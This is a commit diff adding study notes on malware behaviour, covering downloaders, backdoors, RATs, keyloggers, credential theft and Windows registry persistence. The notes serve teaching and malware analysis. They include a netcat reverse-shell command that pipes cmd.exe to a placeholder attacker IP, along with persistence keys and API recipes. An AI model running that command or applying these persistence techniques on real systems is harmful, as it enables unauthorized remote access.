Add the rest of university notes
This commit is contained in:
366 files changed
+9844
-110
No files matched your search
@@ -0,0 +1,203 @@
|
||||
# Malware Behaviour
|
||||
|
||||
### Downloaders
|
||||
|
||||
*Downloaders* simply download another piece of malware from the internet and execute it on the local system. Downloaders are often packaged with an exploit.
|
||||
|
||||
- Downloaders often use `URLDownloadToFileA`
|
||||
- Followed by a called to `WinExec`
|
||||
- To download and execute the new malware
|
||||
- Are often called *droppers*
|
||||
|
||||
### Launchers
|
||||
|
||||
A launcher is any executable that installs malware for immediate or future covert execution.
|
||||
|
||||
- Often contains the malware payload embedded within the file
|
||||
|
||||
### Backdoors
|
||||
|
||||
A *backdoor* is a type of malware that provides an attacker with remote access to a victims machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code.
|
||||
|
||||
- Common variants
|
||||
- Reverse Shells
|
||||
- Remote Access Trojans (RATs)
|
||||
- Botnets
|
||||
- Commonly communicate over port 80 using `HTTP`
|
||||
- `HTTP` is the most commonly used protocol for outgoing network traffic
|
||||
- So it offers the malware the best chance of blending in to normal traffic
|
||||
- Often provide a common set of functionality
|
||||
- Manipulate registry keys
|
||||
- Enumerate display windows
|
||||
- Create directories
|
||||
- Search for files
|
||||
- Can determine the functionality provided by looking at the Windows API functions imported
|
||||
|
||||
#### Reverse Shell
|
||||
|
||||
A reverse shell is a connection that originates from an infected machine and provides attackers shell access to that machine.
|
||||
|
||||
- The simplest type of backdoor
|
||||
- Provides attack with standard shell
|
||||
- Offers same functionality as being logged into the machine
|
||||
- Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attackers machine
|
||||
- This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports.
|
||||
- Whereas outgoing traffic on random high number ports is often unblocked
|
||||
- Either offered standalone or as part of a more sophisticated backdoor
|
||||
|
||||
##### Creating a reverse shell
|
||||
|
||||
###### Using Netcat
|
||||
|
||||
- Can be created quite simply using the `netcat` program
|
||||
|
||||
- This is done by setting up a listener on the attackers machine
|
||||
|
||||
- ```bash
|
||||
nc -l -p 80
|
||||
```
|
||||
|
||||
- Where `-l` is the listen flag and `-p` is the port flag to listen on 80
|
||||
|
||||
- Then netcat is run on the victims machine
|
||||
|
||||
- ```bash
|
||||
nc <attackers ip> 80 -e cmd.exe
|
||||
```
|
||||
|
||||
- The `-e` option is the program to execute over the connection once the connection is established
|
||||
|
||||
- Tying std input and std output from the program to the network socket
|
||||
|
||||
###### Using Windows API
|
||||
|
||||
This can be done in two ways: basic and multi-threaded
|
||||
|
||||
The **basic** method is popular as is easy to write and achieves the same thing.
|
||||
|
||||
It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure.
|
||||
|
||||
1. First a socket to the remote server is established
|
||||
2. That sockets standard streams are stored and spliced into `STARTUPINFO`
|
||||
3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error is piped to the attacker
|
||||
|
||||
The multithreaded approach is the same, except instead of tying the streams from command line directly to the socket, two threads sit inbetween (one for input, one for output) . These threads can be used to encrypt and decrypt data so is not sent in the clear.
|
||||
|
||||
- API calls `CreateThread` and `CreatePipe` should be looked for
|
||||
- The two pipes are needed to redirect input and output to the thread
|
||||
- Two threads are needed
|
||||
- One for reading from the stdin pipe and writing to the socket
|
||||
- One for reading from the socket and writing to the stdout pipe
|
||||
- Then the `CreateProcess` method can be used to tie the standard streams to the pipes instead of directly to the socket.
|
||||
|
||||
### Remote Administration Tool (RAT)
|
||||
|
||||
- Often used in targeted attacks with a specific goal
|
||||
- Typically communicate over common ports (e.g. 80 and 443)
|
||||
- RAT server runs on the victim, implanted within malware
|
||||
- Client runs remotely as a command and control unit operated by attacker
|
||||
- Server connects back to the server to start a connection, then controlled by the client (the attacker)
|
||||
|
||||

|
||||
|
||||
Server will poll the client for new commands - there is not a permanent connection (as to not arouse suspicion)
|
||||
|
||||
### Botnet
|
||||
|
||||
- Botnet is a collection of compromised hosts (known as zombies)
|
||||
- Controlled by a single entity through the use of a server
|
||||
- Goal of a botnet to compromise as many hosts as possible
|
||||
|
||||
| RATs | BotNet |
|
||||
| ------------------------------ | ------------------------------ |
|
||||
| Typically control fewer hosts | Infect millions |
|
||||
| Used in targeted attacks | Used in mass attack |
|
||||
| Controlled on per-victim level | All zombies controlled as once |
|
||||
|
||||
### Credential Stealing
|
||||
|
||||
- Attackers will go to great lengths to steal credentials
|
||||
- Three general approaches
|
||||
- Programs that waits for a user to log in
|
||||
- Programs that dump information stored in Windows (e.g password hashes)
|
||||
- Programs that log keystrokes
|
||||
|
||||
#### Windows Login
|
||||
|
||||
- Windows enables you to extend the login mechanism
|
||||
- In windows XP, this was done by *Graphical Identification* *and Authentication* (GINA) API
|
||||
- Later windows versions use *Credential Provider*
|
||||
- Possible to use these to install credential stealers by pretending to be a credential provider
|
||||
|
||||
Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `dll` to a malicious one.
|
||||
|
||||
##### Hash Dumping
|
||||
|
||||
- Another popular method of obtaining Windows credentials is *hash dumping*
|
||||
- Aim is to copy the password hashes off system
|
||||
- Don't get the password, but often get an equivalent
|
||||
- Source code for several tools is available, often used by malware authors
|
||||
- But also recognised by antivirus authors - therefore malware authors modify it slightly
|
||||
|
||||
### Keyloggers
|
||||
|
||||
- Intercepting Windows login or hash dumping will only provide details of the username and password to log into the computer
|
||||
- Will not provide details of other resources
|
||||
- Alternative approach is to log user key presses
|
||||
- This will capture any password typed into the system
|
||||
- Keyloggers can be implemented in both kernel space and user space
|
||||
- Kernel based is very difficult to detected with user level applications
|
||||
- Frequently used as part of a root kit
|
||||
- Act as a keyboard driver to capture keystrokes bypasses user-space programs and protections
|
||||
|
||||
#### User-space keyloggers
|
||||
|
||||
- Windows API provides two ways to implement a keylogger in user-space
|
||||
- Hooking - get windows to notify the malware every time a key is pressed
|
||||
- Hooking typically makes use of `SetWindowsHookEx()`
|
||||
- Can alter key presses as well
|
||||
- Typically will include `.exe` which will intiate the hook function
|
||||
- And a `dll` to handle the logging
|
||||
- This `dll` is injected to other processes on the system
|
||||
- Polling - malware interrogrates Windows to see if a specific key is pressed
|
||||
- Make use of the `GetAsyncKeyState()` API function which returns a boolean
|
||||
- All the keys are iterated through to see what specific key is pressed
|
||||
- `GetForegroundWindow()` - shows window title
|
||||
|
||||
###### Identifying Keyloggers
|
||||
|
||||
- If malware wants to log all keys, then it will need to have names for keys like `[Num Lock]`, `[Page Up]`, `[Page Down]` or the cursor keys
|
||||
- Might also have strings such as `qwerty...vbnm` present
|
||||
|
||||
## Persistence Mechanisms
|
||||
|
||||
- Various ways malware can get on a system
|
||||
- But also needs to ensure it stays on the system for a long time
|
||||
- Otherwise rebooting the system would be enough to clear it
|
||||
- Various mechanisms are available for the malware to hook in
|
||||
|
||||
###### Via Registry
|
||||
|
||||
- Various places in the Windows Registry that can be used to install malware permanently
|
||||
- Most popular is to register under:
|
||||
- `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
|
||||
- Tools available that can show all the programs that will automatically run on your system
|
||||
- Note that the mechanisms available change as Windows develops
|
||||
|
||||
###### Image File Executable Options
|
||||
|
||||
- One option is the image File Execution Options in the registry
|
||||
- Aimed at letting you debug a program
|
||||
- Set at:
|
||||
- `HKLM\Software\Microsoft\Windows NT\CurrentVersion\ImageFileExecution Options\{exe}`
|
||||
- Can set a key here called debugger which contains the full path to the debugger (or your malware)
|
||||
- Set this on a program that is likely to run and the malware will be launched when the program is run
|
||||
- Can also be used for malware analysis
|
||||
|
||||
###### SVCHOST DLLs
|
||||
|
||||
- Malware often installed as a Windows service
|
||||
- But typically requires implementing as a `exe`
|
||||
- However, Windows provides `svchost.exe` that lets you implement a service as a `dll`
|
||||
- Many Windows services are implemented as a `DLL` using `svchost.exe`
|
||||
- Causes the malware to blend into the process list and registry better
|
||||
Reference in new issue
Block a user